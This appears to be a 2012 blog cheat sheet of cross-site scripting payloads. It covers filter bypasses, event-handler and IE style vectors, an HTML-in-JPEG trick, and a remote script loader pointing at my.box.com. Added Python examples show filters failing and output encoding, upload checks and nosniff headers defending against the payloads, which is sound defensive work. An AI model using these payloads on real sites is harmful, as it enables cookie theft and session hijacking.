Thursday 26 April 2012

XSS Cheat Sheet Part-1

XSS Cheat Sheet

The basics:
"><script >alert(document.cookie)</script>
Bypasses for a filter that strips <script> tags:
%253cscript%253ealert(document.cookie)%253c/script%253e
"><s"%2b"cript>alert(document.cookie)</script>
"><ScRiPt>alert(document.cookie)</script>
"><<script>alert(document.cookie);//<</script>
foo<script>alert(document.cookie)</script>
<scr<script>ipt>alert(document.cookie)</scr</script>ipt>
%22/%3E%3CBODY%20onload='document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)'%3E
When inside <script> tags:
'; alert(document.cookie); var foo='
foo\'; alert(document.cookie);//';
</script><script >alert(document.cookie)</script>
Other XSS vectors that don't require <script>:
<img src=asdf onerror=alert(document.cookie)>
<BODY ONLOAD=alert('XSS')>
On IE, many tags accept a style attribute, and a CSS expression() or a javascript: URL inside it runs script:
http://www.site.com?image=s%22%20style=x:expression(alert(document.cookie))
http://www.site.com?image=s%22%20style=%22background:url(javascript:alert('XSS'))
http://www.site.com?image=s%22%20%22+STYLE%3D%22background-image%3A+expression%28alert%28%27XSS%3F%29%29
In Firefox, if you control the content attribute of a refresh meta tag, you can inject a URL that uses the javascript: protocol:
http://www.site.com?catCode=%22/%3E%3Cmeta%20http-equiv=refresh%20content=0;javascript:alert(document.cookie);>
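The common thread in the sections above (tag injection, double URL encoding, mixed case, nested tags, the break-outs from a JavaScript string and the break-outs from a quoted attribute used in the IE style payloads) is that a blacklist filter leaves something active behind, while context-aware output encoding does not. The following is an added example, not code from the original post: it uses constructed test vectors modelled on the payloads above and hypothetical helper names (naive_strip_script, canonicalize, encode_for_html, encode_for_js_literal, render_comment) to show the filter failing on every vector and the encoders neutralizing them.

```python
import html
import json
import re
from typing import List
from urllib.parse import unquote

# Constructed test vectors mirroring the cheat sheet's categories: tag injection,
# double URL encoding, mixed case, nested tags, event handler attribute, and a
# quoted-attribute break-out. They are inputs for the checks below, not live traffic.
SAMPLES = [
    '"><script >alert(document.cookie)</script>',
    '%253cscript%253ealert(document.cookie)%253c/script%253e',
    '"><ScRiPt>alert(document.cookie)</script>',
    '<scr<script>ipt>alert(document.cookie)</scr</script>ipt>',
    '<img src=asdf onerror=alert(document.cookie)>',
    's" style=x:expression(alert(document.cookie))',
]
# Constructed vector for the "inside <script> tags" context.
JS_SAMPLE = '</script><script >alert(document.cookie)</script>'


def naive_strip_script(value: str) -> str:
    """The kind of blacklist filter the cheat sheet defeats: deletes the literal,
    lower-case <script> and </script> tokens exactly once."""
    return re.sub(r'</?script>', '', value)


def canonicalize(value: str, max_rounds: int = 3) -> str:
    """URL-decode until the value stops changing, so a double-encoded %253c is
    seen as '<' before any validation runs (the %2535 vector hides behind this)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def still_has_markup(value: str) -> bool:
    """True if a raw '<' or '"' survives: enough to open a tag in a text node
    or to close a double-quoted attribute, so the filter was not a defence."""
    return '<' in value or '"' in value


def encode_for_html(value: str) -> str:
    """Output encoding for HTML text nodes and double-quoted attributes:
    & < > " ' become entities, so no tag or attribute boundary can be created."""
    return html.escape(value, quote=True)


def encode_for_js_literal(value: str) -> str:
    """Emit the value as a complete JSON string literal for use inside <script>,
    and additionally escape < and > so a '</script>' inside the string cannot
    end the script block. Use it as `var x = <literal>;`, never pasted between
    quotes that already exist in the template."""
    return json.dumps(value).replace('<', '\\u003c').replace('>', '\\u003e')


def render_comment(raw: str) -> str:
    """Safe sink for the HTML body context: canonicalize, then encode."""
    return '<p class="comment">' + encode_for_html(canonicalize(raw)) + '</p>'


def filter_survivors() -> List[str]:
    """Vectors on which the blacklist filter leaves active markup behind, judged
    after canonicalization, i.e. as the browser or a later decoder sees them."""
    return [s for s in SAMPLES if still_has_markup(canonicalize(naive_strip_script(s)))]


if __name__ == '__main__':
    for s in SAMPLES:
        print('filtered:', naive_strip_script(s))
        print('encoded: ', render_comment(s))
    print('js literal:', encode_for_js_literal(JS_SAMPLE))
```

The design point is the order of operations: decode to a canonical form first, validate on that form if you validate at all, and then encode for the exact context the value lands in (text node, quoted attribute, or JavaScript string literal). The filter in naive_strip_script fails on all six constructed vectors; the encoders leave no raw angle bracket or quote in any of them.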
XSS in JPEGs:
Don't forget that if a user requests a JPEG file in IE directly (not through an embedded <img> tag), IE will process the contents as HTML if that is what the JPEG contains. This means that we can upload a file with a .jpg extension containing an XSS payload. This works nicely when an application lets users upload images that are then viewed by others. This is common in web mail applications, where one can send an email containing an image attachment, etc. Many applications sanitize HTML attachments to block XSS attacks, but overlook the way IE handles JPEG files.
Example:
HTTP/1.1 200 OK
Date: Sun, 6 May 2007 11:32:35 GMT
Server: Apache
Content-Length: 39
Content-Type: image/jpeg

<script>alert(document.cookie)</script>
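Two checks close the gap the example response illustrates: on upload, the file body must actually be a JPEG regardless of its extension, and when it is served, the response must forbid content sniffing (X-Content-Type-Options: nosniff, honoured by IE8 and later) and make a direct request download rather than render. The following is an added example, not code from the original post: it reconstructs the response above as constructed test data with the blank line between headers and body, and uses hypothetical helper names (validate_upload, image_response_headers, audit_image_response) for the upload-side check, the serving-side headers, and a detection check that flags the mismatch in a captured response.

```python
from typing import Dict, List, Tuple

# Every JPEG starts with the SOI marker FF D8 followed by FF.
JPEG_MAGIC = b'\xff\xd8\xff'

# The page's example response, reconstructed as constructed test data with CRLF
# line endings and the blank line that separates headers from body.
PAGE_EXAMPLE_RESPONSE = (
    b'HTTP/1.1 200 OK\r\n'
    b'Date: Sun, 6 May 2007 11:32:35 GMT\r\n'
    b'Server: Apache\r\n'
    b'Content-Length: 39\r\n'
    b'Content-Type: image/jpeg\r\n'
    b'\r\n'
    b'<script>alert(document.cookie)</script>'
)
# Constructed minimal JPEG header (SOI + APP0/JFIF segment), enough for the magic check.
REAL_JPEG = b'\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00'
# The page's example body: HTML in a file that claims to be a JPEG.
HTML_IN_JPEG = b'<script>alert(document.cookie)</script>'


def looks_like_jpeg(data: bytes) -> bool:
    return data.startswith(JPEG_MAGIC)


def validate_upload(filename: str, data: bytes) -> Tuple[bool, str]:
    """Upload-side check: the extension is only a hint; the body must be a JPEG."""
    if not filename.lower().endswith(('.jpg', '.jpeg')):
        return False, 'extension not allowed'
    if not looks_like_jpeg(data):
        return False, 'body is not a JPEG (magic bytes mismatch)'
    return True, 'ok'


def image_response_headers(data: bytes) -> Dict[str, str]:
    """Serving-side headers: declare the type, forbid sniffing, and turn a
    direct request into a download instead of a rendered page."""
    return {
        'Content-Type': 'image/jpeg',
        'Content-Length': str(len(data)),
        'X-Content-Type-Options': 'nosniff',
        'Content-Disposition': 'attachment; filename="image.jpg"',
    }


def build_image_response(data: bytes) -> bytes:
    head = 'HTTP/1.1 200 OK\r\n' + ''.join(
        f'{name}: {value}\r\n' for name, value in image_response_headers(data).items())
    return head.encode('ascii') + b'\r\n' + data


def parse_response(raw: bytes) -> Tuple[str, Dict[str, str], bytes]:
    """Minimal HTTP/1.1 response parser: status line, lower-cased header map, body."""
    head, _, body = raw.partition(b'\r\n\r\n')
    lines = head.decode('latin-1').split('\r\n')
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(':')
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def audit_image_response(raw: bytes) -> List[str]:
    """Detection check for a captured response: flag the conditions that let
    IE treat a 'JPEG' as HTML."""
    _, headers, body = parse_response(raw)
    findings = []
    if headers.get('content-type', '').startswith('image/jpeg') and not looks_like_jpeg(body):
        findings.append('content-type is image/jpeg but body lacks JPEG magic bytes')
    if headers.get('x-content-type-options', '').lower() != 'nosniff':
        findings.append('missing X-Content-Type-Options: nosniff')
    if b'<script' in body.lower():
        findings.append('body contains a <script> tag')
    return findings


if __name__ == '__main__':
    print(validate_upload('evil.jpg', HTML_IN_JPEG))
    print(audit_image_response(PAGE_EXAMPLE_RESPONSE))
    print(audit_image_response(build_image_response(REAL_JPEG)))
```

The magic-byte check is deliberately simple; a production upload handler would also decode the image with an image library and re-encode it, which strips anything that is not pixel data. Serving user uploads from a separate origin keeps a rendered upload from reaching the application's cookies even when a browser does sniff.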
